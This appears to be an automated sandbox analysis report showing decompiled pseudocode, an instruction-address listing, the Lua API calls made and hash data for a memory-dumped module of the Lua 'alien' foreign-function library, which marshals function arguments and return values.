								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L24:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L29:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L19:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t249 =  *((intOrPtr*)(_t273 - 0x14));
					 *((intOrPtr*)(_t273 - 0x3c)) = 0;
					_t225 =  *(_t249 + 0xc);
					if(_t225 > 0xc) {
						L58:
						_t226 =  *(_t249 + 8);
						if(_t226 == 0) {
							_t226 = "anonymous";
						}
						_push(_t226);
						_push("alien: unknown return type (function %s)");
						_push(_t271);
						L00A23F26();
						L61:
						_t277 = _t276 + 0xc;
						L62:
						 *((intOrPtr*)(_t273 - 0x24)) =  *((intOrPtr*)(_t273 - 0x24)) +  ~( *(_t273 - 0x48)) * 4;
						 *((intOrPtr*)(_t273 - 0x2c)) =  *((intOrPtr*)(_t273 - 0x2c)) -  *((intOrPtr*)(_t273 - 0x30));
						_t269 = 0;
						 *((intOrPtr*)(_t273 - 0x28)) =  *((intOrPtr*)(_t273 - 0x28)) +  ~( *(_t273 - 0x38)) * 4;
						if( *((intOrPtr*)(_t273 - 0x44)) <= 0) {
							L72:
							_pop(_t270);
							_pop(_t272);
							_pop(_t246);
							return E00A245A4( *((intOrPtr*)(_t273 - 0x30)) +  *((intOrPtr*)(_t273 - 0x34)) +  *(_t273 - 0x38) +  *(_t273 - 0x48) + 1, _t246,  *(_t273 - 4) ^ _t273,  *(_t273 - 0x48), _t270, _t272);
						} else {
							goto L63;
						}
						do {
							L63:
							_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t273 - 0x14)) + 0x30)) + _t269 * 4)) + 0xfffffff3;
							if(_t237 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t237 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t280 = _t277 - 8;
									 *_t280 = _t287;
									_push(_t271);
									L00A23F80();
									_t277 = _t280 + 0xc;
									 *((intOrPtr*)(_t273 - 0x24)) =  *((intOrPtr*)(_t273 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t269 = _t269 + 1;
						} while (_t269 <  *((intOrPtr*)(_t273 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t225 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t244, _t259, _t268, _t287,  *((intOrPtr*)(_t273 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t273 - 0x14)) + 4)), 0, _t268);
							_push(_t271);
							L00A23F74();
							_t277 = _t276 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a221da
0x00a221da
0x00a221da
0x00a221da
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f6
0x00a221f9
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tointeger.LUA5.1 ref: 00A221E9
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tointeger.
String ID:
API String ID: 346420277-0
Opcode ID: c3929957358efebd1d4d750cea760e8eebb634993df2b9b80bad3cfb711e92f0
Instruction ID: 3941ac9d7e27910ae18bd2914bf9c56fc12eda6af539e443b79ffac43957fcb7
Opcode Fuzzy Hash: c3929957358efebd1d4d750cea760e8eebb634993df2b9b80bad3cfb711e92f0
Instruction Fuzzy Hash: 88B193B5D04129ABCB04EB98FE81DEEBBB8FF49300F144528F441B7246DA399A15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A22228, Relevance: 25.8, APIs: 17, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A22228(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				intOrPtr* _t221;
				signed int _t223;
				char* _t224;
				signed int _t225;
				char* _t226;
				signed int _t237;
				void* _t244;
				void* _t246;
				intOrPtr _t248;
				intOrPtr _t249;
				void* _t268;
				signed int _t269;
				void* _t270;
				void* _t272;
				signed int _t273;
				intOrPtr _t275;
				intOrPtr _t276;
				void* _t277;
				long long _t287;

				L0:
				while(1) {
					L0:
					_t287 = __fp0;
					_t268 = __edi;
					E00A246A0(4);
					 *((intOrPtr*)(_t273 - 8)) = _t275;
					_push(_t244);
					L00A23F68();
					_t221 =  *((intOrPtr*)(_t273 - 8));
					 *_t221 = __fp0;
					_t276 = _t275 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t273 - 0xc)) + __edi)) = _t221;
					while(1) {
						L36:
						 *((intOrPtr*)(_t273 - 0xc)) =  *((intOrPtr*)(_t273 - 0xc)) + 4;
						_t244 = _t244 + 1;
						_t116 = _t273 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t273 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t248 =  *((intOrPtr*)(_t273 - 0x14));
						_t223 =  *( *((intOrPtr*)(_t273 - 0xc)) +  *((intOrPtr*)(_t248 + 0x30)));
						if(_t223 > 0x11) {
							L33:
							_t224 =  *(_t248 + 8);
							if(_t224 == 0) {
								_t224 = "anonymous";
							}
							_push(_t224);
							_push(_t244);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t271);
							L00A23F26();
							_t276 = _t276 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t223 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t242 = E00A246A0(4);
								 *((intOrPtr*)(_t273 - 8)) = _t276;
								_push(_t244);
								_push(_t271);
								L00A23F68();
								_t276 = _t276 + 8;
								_t243 = E00A245C0(_t242, _t287);
								_t258 =  *((intOrPtr*)(_t273 - 8));
								_t259 =  *((intOrPtr*)(_t273 - 0xc));
								 *_t258 = _t243;
